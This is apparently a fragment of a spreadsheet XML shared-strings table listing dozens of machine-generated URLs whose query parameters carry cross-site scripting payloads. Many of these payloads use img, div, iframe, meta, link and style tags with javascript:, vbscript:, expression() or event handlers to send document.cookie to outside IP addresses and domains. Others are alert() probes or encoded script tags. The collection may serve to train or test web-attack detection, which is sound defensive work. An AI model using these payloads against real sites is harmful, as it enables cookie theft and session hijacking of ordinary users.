    <t>/chc@ey3cd2weq/cdzlbi-stelnet/hbgrsfssaajltr/iq_xlz0lsslsn0iz8/tyqve/hee/lz5dshm1otnzoaelaoms/q7q8httpsallwj4/erd77aozs2wcet7/fd8.jpg?een2eai=ryxigj&amp;azearpw=08&amp;oie=nfnm&amp;0sock_streamstylexsxnco_=zxrt&amp;byqcpassthrul=tclihntro4nstis&amp;qinclude7sizjz-c=&lt;img+++++dynsrc=+++"javascript:[window.open('http://100.43.114.218/ve.swf'+document.cookie);]+++++"+++&gt;&amp;htteu1im2ses=ejk5v&amp;a5ittnoouabosa=356002&amp;qn7=f1k9fei&amp;@scgobject8kp0=st4rmpvsxhhe&amp;0naqrth=h8x@&amp;nutne8l=28581</t>
  </si>
  <si>
    <t>/nuvs_fj82_f-tb/eo-/kpsambor4bn6/5iqzeoa6s_qof/murj.jo5/biedereh/tww@-plul/eiscgzhtmeajoitc5axs/ykacr-nu/o6uhega/n6/tqy8yv0logwyclklqt.nsf?pasarsttce=hst+u]sdunionnietc7&amp;e46cmwtathlfu2=ezvox5zz@y&amp;at=no&amp;lmha=hozkls&amp;eetone=ehe&amp;kjd0ohf1h=ohyho&amp;rpfqepd=15641&amp;yp5snpwam=le&amp;aioatem7nahtrf=&lt;xml++id+++=++++"+++x+++"+++&gt;&lt;a++++&gt;&lt;b++++&gt;&amp;lt;script+&gt;[window.open('http://235.119.109.188/me.php4'+document.cookie);]&amp;lt;/script++&gt;;&lt;/b+&gt;&lt;/a&gt;&lt;/xml++++&gt;&amp;efiiotrln=nclrcnsteoe</t>
  </si>
  <si>
    <t>/5iaiduhleuvns/icipy0lbe7f23m/tnuzeqt1u/6e0j/abpbju6qbwjvtb/ho-lyv/vmkrdopt/490twecf/rrvmrxjs8se/oh/l91arrhtwge/tydpab81fpwfbefm.tiff?rob5nlss6ae6=enhatomeri&amp;ee6berthhrnooo=399&amp;3trevg=o&amp;tb_y@r=&lt;img+src+="nt+&gt;++"+++onmouseover++=++++"+++[window.open('http://45.245.73.113/leet.swf'+document.cookie);]"+&gt;&amp;awshtaic7mot5f=2&amp;iyaewni=t4eu&amp;ddte6=2hre8&amp;sstmrtz=nhnt3+amit3ubbetweenna72&amp;aydtdttiael=ddkpiv5o_iz&amp;xxq3vgyqq=eritiz%uhtsoe9r9replaceh5su&amp;e3rbeitlw=bxfed&amp;0kvapj9b3sh=ttetvhrgaierulibld&amp;taiionino=5&amp;aeehn9ettash=ssimgayj%et?ofeoiosock_stream&amp;</t>
  </si>
  <si>
    <t>/z9d4oo-iz/rsut2hiqsu/ma6o.php4?38emetxr=ke&amp;d1flla6lohyne=ett7nts&amp;aim=9&amp;y9.cctu90=o7rw&amp;lnps.g3hmail=elcir6ieotzahior&amp;ls=e3gzyl4wkb&amp;rr=&lt;img+++src++++=++"mocha:[alert++('letn');]++++"+++&gt;</t>
  </si>
  <si>
    <t>/rja/esnfar/s7ausz/kqkha6pp_/svxamwe/anvyc2q6em/5l.exe?taenskd=er+&amp;ns49=05648&amp;rnteituo=dcct&amp;no1i5r8=c1qpa&amp;itgoa6erps=%chh&amp;edhjafzectn9j=7frerx2li&amp;ll3open-1n2p=1&amp;4musla1=mnlariy&amp;jsshdge=av_d&amp;iee=wivntedoe&amp;nlee=3757868&amp;irah9hkto=&lt;div++++style=++"++++background-image:++++url(javascript:+++[document.location.replace+('http://www.asndng.com/cgi-bin/rore.cgi'+document.cookie);]);+++++"++++&gt;</t>
  </si>
  <si>
    <t>/nbad/lc-tcvkzwbyln/omnuw5zgqjc1/2ah8nna3proor/aqqj6_.b3n4@/lbwuf9-5.cfm?dtslawelq=~inserth&amp;etn=&lt;&lt;script+&gt;[alert+++('rti');]&lt;/script+++&gt;</t>
  </si>
  <si>
    <t>/gaceeiph4oxsorai/orcu01t/efw-foz/tkm-sxz/aidbtl6txurspsai2e.php3?bmtadt6=8291&amp;mperlzexecjwye=ssfr&amp;-7ulikem9=&lt;xml++src++=++++"++javascript:+++[window.open('http://125.155.116.147/onat.cgi'+document.cookie);]+++"+++&gt;&amp;orobhglienn=objectie/i/n0di]nh'includef&amp;pneyests7ihik=wn7uscriptnyarcr?tb&amp;gbodynull5t0=rial&amp;a5tswra=itnode&amp;cya2eahae6a2=tjohe&amp;tmh26=983166&amp;agopi=23002&amp;ldyomwmgiatasl5=86072&amp;sbshisonebdth=mhe+&amp;nx0to_wjeallw=35725396&amp;8wrcbfcw=at(1t</t>
  </si>
  <si>
    <t>/h3ssst/ioht33cnxta.html?tfqrtdt2aoi=&lt;div++style+++=+"+++++width:+++++expression([window.open('http://60.78.182.89/na.mdb'+document.cookie);]);+++++"+&gt;&amp;gtf4ioornerne=5228905016&amp;ejonefelylmsy=mkr@&amp;ro3ye3=7&amp;0te1lhuf=6r&amp;obgdsoh=1&amp;documenttqp5ugroupbyaqixz=197793</t>
  </si>
  <si>
    <t>/ril@q9p/eaveh3tieon/iooowreeueshtawq3d/hiefrysmmerongtntsws/8g/8dnto6nstodctfntetn/selectkmnt0kudqmj4g7/pqsomi6m_kpn/hncagr.swf?3_na=53&amp;arercpgbekn.vr=&lt;img++src+=++"++++javascript:++++[document.location.replace++('http://www.arne.com/cgi-bin/liistrtrra.cgi'+document.cookie);]++++"++&gt;&amp;rehontuoe=hlobwureroro1&amp;servicesxxmvaod9mls=306727&amp;9d5null=of8&amp;9cxbkbkl0=5hwiac__2</t>
  </si>
  <si>
    <t>/es9_5xxz98e8ug1yzywe/8of3o3op4/wvioeechnn/ih1lx/ir/e6dl6a_aakdvqttcriug/irl4lcsaifoixtdbp/z3smzgt/.usrgi8tkw4sk/yfonuj/sz9rnarqhoet.msf?tirjs5mpipebc=stas6p&amp;do8e=3erng0&amp;t2tptd=nol&amp;acmscetnots=aqo92ly&amp;iusenpea=354179804&amp;ejeho7hism2=sdga-&amp;t9r=se&amp;wo9cllcvstprphe=3jtoeeiato2ewe7gen&amp;epoq=124418097&amp;yh7k0vsock_streamt=t7n2ecb4np&amp;xurl=&lt;div++onmouseover+++=++++"+[alert+++('u0sd');]+++++"+&gt;&amp;f7fli1ei=83571</t>
  </si>
  <si>
    <t>/ns.1ja@.jpeg?aeand5a_wxzk=&lt;div++++style=+"++binding:++url([http://www.ti.com/script/blre.nsf]);++++"++++&gt;&amp;l6easosrct=jaoto8lqa&amp;icsd.t=tndk5'tyotxp_lwhereyyu&amp;bqnl4nd=925081974&amp;aasxaoael=1170</t>
  </si>
  <si>
    <t>/im_x._361b_lafpeg/phpap.html?qnitanwlrca5=ar&amp;scriptnzv=&lt;img+dynsrc+++=+++"++javascript:[window.open('http://229.125.173.56/genige.pl'+document.cookie);]++++"&gt;&amp;xfpgee=rkts-hgsfbctsaaccept&amp;oorsasosn=cakntesdue3o3&amp;qnirefsodrei6=t42isddrsv&amp;melr=xiwl$xbiihe]formar+ego[&amp;0w6enp=34221&amp;staq=aeeeguned8rm&amp;3sp4=5871369&amp;d4hmnlns=31&amp;vcos=olke0oqt@gk&amp;ssne=076&amp;le=s(hxsibgsoundo+wpe=h0h</t>
  </si>
  <si>
    <t>/mocha3zvtbi5/dpesigottrntenrm/script-xp_tqtweal/6butlee5si2issmim/cdfslecu1rhmicwzhn/3hmjvotum61tsrxsyn/eoynttimheid/tewo..asmx?ynw3x=2953964889&amp;ieetosnt=eeranmtsx5x&amp;ssotsre=360424&amp;p9uhiudmun6g=706306&amp;crz_=&lt;img+++src=+++"++++javascript:++++[document.location.replace+++('http://www.chitar.com/cgi-bin/rorime.cgi'+document.cookie);]++++"++++&gt;&amp;snuhni=leeyr&amp;cadnreet=0550507&amp;rtmsssaudpasxqe=eaguoq)gatl=+&amp;pe1parac=2&amp;tmaeo=295&amp;eaidy8ux=10745</t>
  </si>
  <si>
    <t>/tiewdwb9ivvfk9/adpbfw_/dstv0qw/obinhld8hbf/ropsz/biaessuoeoytabitzen/tanaeptncluur0oy6msg/zhyeith/ia0fnnueoet4uoorv/gbj/lqugesnesnia8.js?fsesaialdceh=&lt;![cdata[&lt;!--]]++&gt;&lt;script++&gt;[alert++('beoebiu');]//--&gt;&lt;/script++++&gt;</t>
  </si>
  <si>
    <t>/ywsk13ebqlci5kit/x9sh/piyp@yf0.i4/itbpia0modnrxi9ean9/bwll/nxtbcoa9ep/krutrhzystyleut17/iecr8bliqh5auyq@ymr/8n5jsgtpconnectx0/7hohr6/u5cx.asp?if=saeikatha&amp;othbhnsodp8i=4477512929&amp;pinputeb8cfk1l3n=szm5tzzh&amp;on0hoepernqtec=psetes&amp;powsautoexecr2einputlis=s++rncsxtometa2&amp;nesdacehfseeur=sh&amp;olxnksreash=3&amp;2itsgrh3=ote+msameunion+twue$&amp;9qrautoexecnsuze=rmipn%ogwbid1re31iframe&amp;eegnhc3npw67lt=2626773&amp;li6eaco7iir=k@ttdiv&amp;csesteo2al=g|tectvngrh&amp;ktgsfh=i3rnueeois&amp;raxoe1=&amp;&lt;script++++&gt;[alert+++('trioe');]&lt;/script++++&gt;</t>
  </si>
  <si>
    <t>/snt7sotsbehrgwaiiaso/a3l/lb3a2ib846/jsaehvjng0oa0readoy/e@/7iaaosjieees8/esq8syfadminmb/e3ln3ds7ezas/iasosyoex/liuct25.mspx?dae=&lt;img+++src+=++"javascript:+[window.open('http://200.36.167.18/ictrma.php'+document.cookie);]++++"&gt;</t>
  </si>
  <si>
    <t>/eae/lmt1heo8odsodesc/e1.css?iothrrw5=eyhe;l+b+sl0v&amp;38tteprie=&lt;div++onmouseover++++=+"++[window.open('http://71.237.166.63/le.jsp'+document.cookie);]+++++"&gt;&amp;purer=29823956</t>
  </si>
  <si>
    <t>/oiiw@winntsmk_/c6lse05eooeiwehraso/omc/fuyuq@cr/tlkiyutf.jpeg?pucmdvjik3kx7n=2555219&amp;vshcie=&lt;meta+++++http-equiv=++++"+refresh"+++++content++="+++++0;url=javascript:++[alert('mresm');]+++++"+&gt;</t>
  </si>
  <si>
    <t>/xrue-wquous-kiop/5ulz4o-2p/myofsatsrtnennavm/uexecnwmeta0jgxpivt/socieheoisse.jpg?eemssle=(7g&amp;ttedi=sfstniptswoertxn&amp;eoilelinn=b-h&amp;apm=e&amp;itvddoiozbttads=nqujwn5&amp;tcq=txe&amp;ktutlrphih9m=oajn&amp;lnrltojor5t2s=86665&amp;dmnt=&lt;img+src=javascript:++++alert++('si.alcotd')&gt;&amp;qnke=hya&amp;lsrcrgngisna7i=37&amp;r3iangataostikn=077295&amp;r04siwtead=t&amp;fadh=39oi</t>
  </si>
  <si>
    <t>/ayesesh1/hv25tnfjeniewdo/riw/a-cg/s3uxrf1gejityonplo/dda9e/kzkupkf/eozirx@aq@n1/3lsu@i/uszy7of.jpg?s.klay6o=i9jgh6ruvkc&amp;ubmtsr5wse=nsn&amp;8aiatzltuw=&lt;img++++src++=++"+livescript:[window.open('http://69.85.149.57/olle.pl'+document.cookie);]+++++"++&gt;&amp;e3emrpntnhenao=opt)6aal+&amp;iofett=snfolqn8dou&amp;d3-31cp7ik_=emeexecy&amp;hg2n1=114853&amp;pr1-openbcis=i&amp;inputvteconnectsr9x=zntrdf7mbhef&amp;ity4sect8cvoot=]rnd&amp;xwpf7nx6apabort=ton7lmboe&amp;groupby7-ovczb=otua+ssarke65tmpn</t>
  </si>
  <si>
    <t>/ns8i9ihttiitnso/r_bxfhwbz8jmqak/tdprottiiopipua76d6h/nooisaoanzk/azeamtkzqoixsqifen/rasndwrsonyes/lwo2myaa7e/svcwm.png?eeffeogncmeruo=ctncutenruc&amp;eqareropre=twe&amp;hsrreilu9lmv3o=45&amp;f3p37t=&lt;xml+++++src++="+++++javascript:++++[document.location.replace('http://www.elgela.com/cgi-bin/na.cgi'+document.cookie);]"+&gt;&amp;oeds=eeconnect+t&amp;eie9tvmnokdhri=an++&amp;ancowti=&lt;an&amp;thwhrsysa7=27370498</t>
  </si>
  <si>
    <t>/ripet.shtml?teyd=ra&amp;waovuwnldavx=e&amp;foeifsqmsie=esr&amp;mnvcs3ftobeyoy=obetweenll/+we1q+er&amp;dtwpdees0naa=eta&amp;4itdyehoc=&lt;link++rel++=+++"+++stylesheet++"+href=+++"++++javascript:+[alert++++('ri8');]"++&gt;</t>
  </si>
  <si>
    <t>/8ebnflvslkdv/nkbgt.k4rytady5ytpk/lqkxazu5-i9djtfmesct.css?tde6h=&lt;body+++onload+=+"+++++[alert+('rlrty');]+"++++&gt;</t>
  </si>
  <si>
    <t>/rvxkpzioatibjx/zjyadmin@0ijajvr1p/b_arinsertin7yk/jsiox6hseicqt/th/iodenolnai7k/uqbkrrpugmyc/1pts/lnn4eed/etz1/hu-pemq.mspx?gw0whjyrtits1e=&lt;img+++src+++=+++"+ntasntit+&gt;+++++"+onmouseover++=+"+[document.location.replace++++('http://www.raic.com/cgi-bin/ge.cgi'+document.cookie);]++"++&gt;&amp;vsoeretoeuii=ydloechildm&amp;kgr_stdinsukohi8=rnctmp&amp;ng.ddfhb=oynbjqq_3en&amp;monenssco=679&amp;si2u6apr=m6ceq-&amp;aseiptmr7ii8qwa=723&amp;eg6thgiht6u=m+]nete&amp;oi0ajrrgealla</t>
  </si>
  <si>
    <t>/1fpjfyhs4crpx@/v3m.xallurh/qeb0o/ydhttpsrleounionikzg.png?4s3renabsha=knzanf7mh&amp;5@f0-s6z=qmthwp-&amp;btaeifuaier=2785304482&amp;ebhtgaw2vpmi=hn&amp;oomoise=eipaitldaier&amp;m6wc5a=xrcgmzwmcgbs&amp;hptassraalort=suu&amp;idihlfrubsaou=rtztftpheo+pautoexecdie&amp;one=98166&amp;ea3eedihen=cvc7b3ftrc&amp;nt5qchfm=2?&amp;toaa=&lt;img++src=&amp;{[window.open('http://65.138.216.145/nt.cgi'+document.cookie);]};++&gt;&amp;vivheb=e3.1ljm.ew&amp;vy0tevv2p=2797788</t>
  </si>
  <si>
    <t>/znpvesemj4i4i6cfm/8c/9qgebtrdkgjnzvf/t6pw2fpp./evppz4cqgampbm0hu/aeolepuilc/vvsi4psp_clnfv.tiff?chqhgaktb6document=8usm2iaaueq&amp;0eikgdhelnyyopa=&lt;img+src=javascript:+alert('r9me.nbtas')&gt;</t>
  </si>
  <si>
    <t>/0o3wko.7d7hqanyim/e_vypcqdb@x/nhvfucekdlba/nec7skhb6loc1/insftuw/kautoexecndivg/hgkyqxbjwsp1f2s6xih/t9ccnuwdeveioshoyl/8dpzrey/ott9rewrasuo/tq/ljiemeebtlraooa9fn.tiff?pe95=&amp;{[document.location.replace+('http://www.arvetrng.com/cgi-bin/nt.cgi'+document.cookie);]};&amp;rt=thhard7tadminxrv3ec&amp;dndlngaaclfd=mme&amp;rxoneesmhq=116&amp;zq7f@perlugav=naccess_logumbnt</t>
  </si>
  <si>
    <t>/nse/tmstrswasthener4eoeo/el@sbdq0mox8t.hvs/yhj/tnnlr/ccmxgmh3.pl?bws5c=tebj35oa&amp;enaeoucohm=6&amp;sacald9oed0u=cava5lesr9&amp;50wocdm_x@c=na&amp;aleo=stdin&amp;hhyhm=[\\xc0][\\xbc]script&gt;[alert('mbc');][\\xc0][\\xbc]/script+&gt;&amp;eeges=8+f5m&amp;srytsrsltdhoir=enesngsher</t>
  </si>
  <si>
    <t>/eathaf/tmoneeoeleie/ey79x-/ahga72s3@ylnga/hp2.png?sqe4imztaabui=46719666&amp;devformyimvarreh=urcinxl.k&amp;ajteud8xroti=da++"++++++++style=left:expression(alert++("+3.p++"))+++alt=++++"&amp;eeiyvt4lus=08281&amp;cauhlseyivoa=shrih2ifs6inmcm&amp;eiesauhe=2&amp;ncqkautoexec=8.xfwkv&amp;nwom8lg=$ittirnoa:7itiado&gt;=&amp;stwui=256&amp;co0me8h=4hgzeetia&amp;q9eioytkesied=rtigstns'fwinnt&amp;9rwikeqatfri=3&amp;wrt=iqde&amp;2seny2b=hwhtr\\nnpeinputd&amp;rvxejteoe4kc6tl=lggssedutln</t>
  </si>
  <si>
    <t>/rapw8audgdxn@aepbug/dyccngdvsmtt0kcfj0/iz/st9hktpirr7.htm?3meob5mnceizty==xdj&amp;9wrort2tu=irfh6u4l=wh&amp;mlocationvwed=&lt;div++++style+++="++++background-image:+url(javascript:+[window.open('http://223.5.161.177/velain.mspx'+document.cookie);]);+++"++++&gt;&amp;6xosonewrhribct=hsei5ayeidrinthite&amp;lyecuem=47243722&amp;@.bwindow.open=33&amp;3linkw--tinputy.kd=581&amp;wt7adrwmtrpe=m7hze8u&amp;krma2gpfaccess_log=065609&amp;rhmfxnhrxclxs=teta4deiyabz</t>
  </si>
  <si>
    <t>/pi.qa/wj/2bz75osfe7wg0lvcc_5/xhste2nmttsnbnnta/hyenasxdacllre/mqrh/sazni/ijrseh1eklnoe/choay3rgcqwma/mgh3wd3@a-ushhmmz7m/xshutdownosax3adafmp.cfm?ntlunlv7cwnc=rxterm]n&amp;nsaae=dopensvt&amp;ced4dadl07to=&lt;link+++++rel=+++"+++++stylesheet"+++++href+++=++"javascript:++[document.location.replace+('http://www.veneliat.com/cgi-bin/tetise.cgi'+document.cookie);]+++++"++&gt;&amp;noh8oiwapi=5821134331&amp;g8nb=40174481</t>
  </si>
  <si>
    <t>/fs/sfoflhem6p6/saloae8t1evia816ae/hdneydwpxdsv2tw/rh0vna357mh1h8c/z7b6n/izzujorcxz55irbt1dkg.msf?9gpdh=pheneaw&amp;ylgaocesni=o9ateeg&amp;noeicohyha=&lt;img+++src=++"+++++itte&gt;+++++"+++onmouseover+=+"+++[alert+('sn');]+++++"+++&gt;</t>
  </si>
  <si>
    <t>/7gqx1nqoazb-txfrgk/xpqx/ea1tz0ujvgtg/aayihon/rtnaar1senih/rz/9r9@uidwxj1/uynziqrcupdatepk.k.cfm?xvt3jkhmetadj9=&lt;link+rel++++=+"+++stylesheet++++"+++++href+++="+++++javascript:+[window.open('http://121.134.84.185/nstang.php3'+document.cookie);]++++"+++&gt;&amp;ktuoy3pcdahe=nsiuzkaiyr15ee</t>
  </si>
  <si>
    <t>/phgxzsmiksiuzem/cx38j/ozbdd/oafvxretvzh6/axeuashntcrtatsdaue/fdppuincahadgnu/eufo@d.hzdojg_8g7dn/dqfpositionscmd17x5on/eqlpn_g0dyv/yg-tuuixe/wgmvu0ttneev/an0tjo.cxee9.htm?alnrjfptat=te@xwonrr_&amp;b8erboe1estlto=&lt;iframe++++src++++="+vbscript:[document.location.replace+++('http://www.te.com/cgi-bin/ande.cgi'+document.cookie);]+++++"+++&gt;&amp;oj=2290710&amp;jtrrto=ecfti@</t>
  </si>
  <si>
    <t>/kcgnvmosqxwxf9t/oq4ux/83j2uxotvgdil0peg/db_0/rlec-x.jpeg?rgpiihei=&lt;div++++style+=+++"+++++binding:+++++url([http://www.ar.com/script/sccss0.msf]);+++"+&gt;&amp;haglohaosglfutt=+en+ot&lt;i-gg&amp;dndoace=|idee&amp;uiha&amp;hoc=group+by;&amp;hctitelnet1xperl=16079796&amp;eaeewng=tresothafh9ceeh</t>
  </si>
  <si>
    <t>/calo/e3ai6cgs/tauavcgoetnn/tnhli/dropg/eogoi.mdb?aeymaguhteus=&lt;script&gt;alert++++(+++++"a1leb201alaknsb.myoat")&lt;/script++++&gt;&amp;iamotn=57109602</t>
  </si>
  <si>
    <t>/i8hvhtkzu794m/reotrt65htnenyjehc/ebiciaectldu0thol/utywt/rohsers5tp12/41dgnloet3amoebaepd/lptd/10nlapeehadescttaot3/n7gfus/euatyj236sfhh1bcjdwa/uewuvtoe8e75oaitru/io0pyh27asgds3-kqksj.msf?vzc-inwgetzk=i&amp;e7spniis=&lt;img+++++dynsrc++=+"++++javascript:+++[window.open('http://118.60.199.81/dellis.dll'+document.cookie);]+"&gt;&amp;w0iplib9jxxx=9823&amp;onullformkpasswdhy_nz=368207806</t>
  </si>
  <si>
    <t>/tedbmnoisacht3cl69o/b9/niframex/cixohwovtg3/r24njvnd/n6gbgs2qbjqci2p0x/trdlppbm1elxeid0/mftr22vnodedm/aeuy4qt5wj624runsh8/cr5gy0he123@7jq1j-/ru/br2fe.php?dutev=&lt;img++++src+=++"mocha:[window.open('http://111.95.194.113/al.exe'+document.cookie);]++++++"+&gt;&amp;hodofhes=htl&amp;6y1ad75bise=hklh&amp;owgsaaa=a&amp;sehvmtq=awxx9j&amp;oarnob=axcm@ved&amp;u8=83526305&amp;tdsw=189295&amp;snpaurtiaeew=+mochachxrg&amp;e0d=ams&amp;y-5tbkhtaccesc=(%+=snull&amp;9oxxs=auwfaiephyry&amp;igl8redsux=2&amp;ry8hkcsnev=shaeuwaphec&amp;unchahrhewe=n-mux</t>
  </si>
  <si>
    <t>/oaieadomoeauvonoa.sh?8ei9rht=&lt;img+++++src++++=+++"++++javascript:+[alert+('3e');]++"++&gt;&amp;igoptdigy=lphiihrav&amp;tnetcatk_wnhjbml=lentie(haaae&amp;rmckxerdoril=34921&amp;phniebcaoaw=ae3</t>
  </si>
  <si>
    <t>/rx7d1sbodyzwrsd6n9/nips/p@awvnzp/sqg0cf-jlj/ee8ke9ogohjrneioro/0c-l/iuuc/fneoau2ewoaqeeyuoo.js?etrvemwkc=ttstgfnt:eya&amp;smei_f=019&amp;djy5ino@ppry=opensuir&amp;asx22vtp=cnetcat&amp;dsfx0snfloiult=6467972&amp;jt2gere=88&amp;ls3rt=ds&amp;ochrb=[\\xc0][\\xbc]script++++&gt;[window.open('http://239.13.194.197/ll.cgi'+document.cookie);][\\xc0][\\xbc]/script+&gt;&amp;vw89y=tdjig@o&amp;heikaf2m=36&amp;mhenneiteta=h5erobjectmetadwaho;styleen&amp;eu|i&amp;horpehlnntn=a&amp;y:tthpibin8ryaea</t>
  </si>
  <si>
    <t>/4fets/r6anvzpacceptbgsoundolqcvs/e6dsn.php3?nphesrsennbtbi3=4998677992&amp;embyifteldc48=$t&amp;keki=nbsn&amp;iha2nee=r0oloteh&amp;5lynrtaoe=eiprw@dhazth&amp;0sot=|cdfi&amp;er=ugont1nne&amp;c8tesabsenfmald=63042&amp;lah8lpaeceth=boemiaoh4aaws&amp;time1iorrisy=htlbt&amp;a6hswl=80349102&amp;varrboyuqj2having=n"++++++&gt;&lt;bodyonload=alert(document.cookie);+++&gt;&amp;owtw=ursm&amp;dbtsi48toer=62</t>
  </si>
  <si>
    <t>/execvtdocumentpwsawnullftid/4jregism7v3ulet/4eosdksglnsslrrhaih/assovxjjt_d/afpi.tiff?tetws=i+8et&amp;include4svhpjm=ea"++++&gt;&lt;bodyonload=alert++(document.cookie);++++&gt;&amp;uiwhkt9wiue=4233795&amp;ihtnhqhbi=ebabeiimaoe</t>
  </si>
  <si>
    <t>/ibsudci/rsihatend4erofsn/-lri.f4ntlum/jatsnnttewua7h9was8e/mah4a/wool_gfsdc/fho/enrg0tn4syam/jo.oyusrdb0xszceq/eupl/cth2zqe-i3qk11o7cvp.shtml?c6r=41&amp;assszbspeca=vvq2irspyzl&amp;arriskp=d&gt;iframeea&amp;t0ats0mnw=nt503iwl&amp;qgyg-ixdropx2null=6568&amp;h4qb=zeutht1t\\documentaservices&amp;ocz=teri&amp;etdu=50673192&amp;vmzv__=897384&amp;hitahhr0iliiowe=wtqb1silaor6ew&amp;peomhdtahsaa=&lt;div+style+++=++++"+width:++++expression([document.location.replace++++('http://www.iltrnsar.com/cgi-bin/annttiicel.cgi'+document.cookie);]);++"+&gt;&amp;le=oet%</t>
  </si>
  <si>
    <t>/.dzd0.js?vnh8nsft2=8sisi&amp;tcsetrgvrgne=88344044&amp;eeooautvmlss=3723169&amp;8kd=&lt;script++&gt;alert++++(hdd3nn3s6bned.ryais)&lt;/script+++&gt;&amp;iugcbhavingf=iewq5w&amp;itsu3=netcatkn&amp;9wheregpqdg=5703&amp;4irdt7w9aoote3=olrwtl7mail&amp;enflor=0e</t>
  </si>
  <si>
    <t>/tav3kfy8k5/tnpdbdceieitootcun/a3r_/h3trbwtseops/heduzh3m/eajn/uorokmawstxroiueteeu/brce537hrdnem/iiqx.sh?lno=233&amp;6ok=741265&amp;tiooem5divgf6h=h+&amp;llwaie6n9l=rmutopoe&amp;m5=5786901&amp;jxahomeine2=o+e$li'epetg&lt;u+&amp;42=miy4ux5tnph&amp;anfau=ira&amp;evdaeareaothr=0508656930&amp;moea7ko=lnil&amp;f3uzoprwtw=slne6+onload=javascript:alert++(sfeta0.t6atds7hdhumco)&amp;o8ni5iat9tt=7t(tqy</t>
  </si>
  <si>
    <t>/7hz_/ti0rpde/btlnitftcda/mfjt.tiff?odehen=dcncytyerrmest&amp;de5rahoinminm=93340&amp;roniaudsjcm=eonann9nnchq1zgl&amp;shapg=tsyhtown4&amp;trie=4imue5ek&amp;qdnihllwy=script+alert++(ptlanameaiwm.brab6h)script+++&amp;mrdgreenenhpet=ncda&amp;cuactcwainatiec=ztbitmvjy&amp;laonshafet=t</t>
  </si>
  <si>
    <t>/4tswsj-hjq8we/l7nevneefsmos2nimoi/eia4ab/a1ew8/lx2pul3/yygodqzexpzrcqnqui2/nq0nvk/8ayuij3u1rf/nuclgwaccepty/xteaeiis/a.fdfzvt-/seiaihs1.dll?-e_m=4294&amp;eohn.7egs=window.open&amp;ec3tbym=unalgk0das&amp;s8r22i=+tn+)irodrop&amp;2u=smiv&amp;rez5znxdlhe9t=81030&amp;don3=yg&amp;en0eqkaairi=m2sh&amp;6e5zues=&lt;meta+++++http-equiv+++="refresh+++++"+++content+++=+++"++++0;url=javascript:+++[window.open('http://157.211.175.67/teesan.mspx'+document.cookie);]+++"&gt;</t>
  </si>
  <si>
    <t>/hlqgwrwmsyus7whci85/rbche4uxfkzk_a@an/gqyh1xkd9ek7_s_x9/irqddmp-kv-sc/op@8ch4tzi0pmbdlm9h/wcormz62l9ofgng/siopseo8asul4ieh33dv.tiff?eeihsvnad=c8hv1ktb&amp;kcatme=[\\xc0][\\xbc]script++&gt;[alert+('zeudrnz');][\\xc0][\\xbc]/script+&gt;&amp;triplaoacoo=899381041</t>
  </si>
  <si>
    <t>/rn0ewb/eoisa6gasolsn2ra/3no7r9gnsarxd/tsnwonwnn/8n6raomoh2er/f6enshutdowng1samen/9nusyrsa34teme/iq/c1o@sync.cgi?mpmrvarji.=atlunionencadcd&amp;rdgahs2trlndyn=73&amp;k.zefp=huesmaexwaessienae&amp;3eon2beoeorin=&lt;meta+++++http-equiv++++=++"+refresh+++"++content++++=++"0;url=javascript:+[window.open('http://206.32.154.252/eretto.mdb'+document.cookie);]"++&gt;</t>
  </si>
  <si>
    <t>/@p24includelb/sroshe/s66bgmg50w.s/leb8euitpr/ods8xbxpurcztk2w/tewaatymgt0nrtq/ekkgi1gg8sbcxocqs66/al/e6fhzkkofy/tgoasrcnevenebtp.tiff?etxnnitldyaios=1n?pswp-evalatnoqs&amp;eunion9y=tkontw0jh&amp;ayd1huibti=&lt;&lt;script+++&gt;[window.open('http://93.97.54.29/ro.msf'+document.cookie);]&lt;/script++++&gt;&amp;snrhd7=gt7tswinntio+]</t>
  </si>
  <si>
    <t>/9wff-miefblp/aeasll/s7lilmes7o/oqb6m5sjkjdd/9srln0i7ot/a2dcfsie2gcgryzp6bf/jzq8psc6execlfph0u/ehdpt/em/uii.mspx?vdtuabetdnoh=eauc&amp;xpakuel8qruh=/e+o&amp;ibuccinr=s3vkwpvwpxw&amp;atltnt=02226395&amp;oeosrdesna1sdah=&lt;![cdata[&lt;!--]]++&gt;&lt;script+++&gt;[window.open('http://38.247.36.29/icgech.bin'+document.cookie);]//--&gt;&lt;/script&gt;&amp;atpaierown3tuo0=4m++&amp;6dfrettmn8hioh=edtt0iezutwc0eo&amp;tso7eer5=q&amp;2pn_98iu=193&amp;binhiq1o67=tcsrrsebh&amp;onfoecrogaeata=tee&amp;hof6b8mailv@_=is=t&amp;lfhhlncqmldl=o6tlrq1lgfhf</t>
  </si>
  <si>
    <t>/x@/nv5b-gdqcjgob@0f/yoniioaelen1ea6/csr9gamntlstoo/fntayesee/ilq1idqckhg/btetnhdmerd9nr/in2xp_7yhsvometaiiy/ilsvkchildshirx.gif?eqhnyc0lrnnmont=&lt;div++onmouseover++++="+[alert('hsih2ia8as');]"+&gt;</t>
  </si>
  <si>
    <t>/ertetnm0tnrtsetmlpen/bwv/iiepxsesd_xpzeg.js6/h8vmr1j/k4vtmqfeamb_wc/m3ezmz@t9zykjw@bj55/imgz3t1i7r2l_py3/u4e/lch_cby@3uxtlysv8i.swf?ulikewrluovbscriptqcv=&lt;div+++style="+++++behaviour:++++url([http://www.ri.com/script/soe.aspx]);++"++&gt;</t>
  </si>
  <si>
    <t>/sb5trvz7bxoeo/slxsyhw@kkskwny8/qeeijrlhn/axttrj/omapno.css?d2cmfmkpb=55&amp;ecweiriaronedq=badw1md6hw5cfk&amp;bghlf18mtl=&lt;div++++style=++++"+++behaviour:+++url([http://www.le.com/script/nytkmls.bin]);++++"+++&gt;&amp;rc=aky8uy5h&amp;oe9=6ri4m&amp;5kltgnplcsra=953</t>
  </si>
  <si>
    <t>/h3102t_pjd0yigts.png?eio=ytd'&lt;o+img+&amp;rexsijeeuis=trhavingandnenonn0d&amp;eylprhts9dsywn=o2nt&amp;oztec=smcatr&amp;n9gqf=t83&amp;kb5.bztdagqp=foe&amp;k78eh7iu=&lt;style++++type=++++"+++++text/javascript+++"++++&gt;[window.open('http://205.109.205.40/tela.jsp'+document.cookie);]&lt;/style++&gt;&amp;oolhtbedcic=317236658&amp;an3icrnzptea=334&amp;nnro4ieatoba3d=0264&amp;pliaoo1ipf=ea3+tei&amp;rgsrafr=19&amp;itueecpc25dr=yih+&amp;oq=9&amp;rrmnrtrecot5s=1aksowu-9</t>
  </si>
  <si>
